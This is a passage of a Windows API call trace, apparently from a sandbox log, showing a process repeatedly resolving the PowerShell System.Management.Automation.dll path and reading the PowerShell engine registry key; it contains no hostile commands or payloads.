lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.056] GetLastError () returned 0xcb [0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.056] GetLastError () returned 0xcb [0142.056] GetCurrentProcessId () returned 0x328 [0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.056] GetLastError () returned 0xcb [0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.056] GetLastError () returned 0xcb [0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.056] GetLastError () returned 0xcb [0142.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e048, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.057] GetLastError () returned 0xcb [0142.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dff8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.057] GetLastError () returned 0xcb [0142.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dff8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.057] GetLastError () returned 0xcb [0142.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e048, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.057] GetLastError () returned 0xcb [0142.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dff8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.057] GetLastError () returned 0xcb [0142.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dff8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.057] GetLastError () returned 0xcb [0142.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.057] GetLastError () returned 0xcb [0142.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.057] GetLastError () returned 0xcb [0142.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.057] GetLastError () returned 0xcb [0142.058] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e56c | out: phkResult=0x25e56c*=0x35c) returned 0x0 [0142.058] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e5b4, lpData=0x0, lpcbData=0x25e5b0*=0x0 | out: lpType=0x25e5b4*=0x1, lpData=0x0, lpcbData=0x25e5b0*=0x56) returned 0x0 [0142.058] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e5b4, lpData=0x2e48d0, lpcbData=0x25e5b0*=0x56 | out: lpType=0x25e5b4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e5b0*=0x56) returned 0x0 [0142.058] RegCloseKey (hKey=0x35c) returned 0x0 [0142.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.059] GetLastError () returned 0xcb [0142.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.059] GetLastError () returned 0xcb [0142.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.059] GetLastError () returned 0xcb [0142.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e044, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.059] GetLastError () returned 0xcb [0142.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dff4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.059] GetLastError () returned 0xcb [0142.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dff4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.059] GetLastError () returned 0xcb [0142.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.070] GetLastError () returned 0xcb [0142.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.070] GetLastError () returned 0xcb [0142.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.070] GetLastError () returned 0xcb [0142.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.070] GetLastError () returned 0xcb [0142.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.070] GetLastError () returned 0xcb [0142.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.070] GetLastError () returned 0xcb [0142.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.070] GetLastError () returned 0xcb [0142.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.070] GetLastError () returned 0xcb [0142.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.071] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.072] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0142.073] GetLastError () returned 0xcb [0142.073] GetFullPathNameW (in: 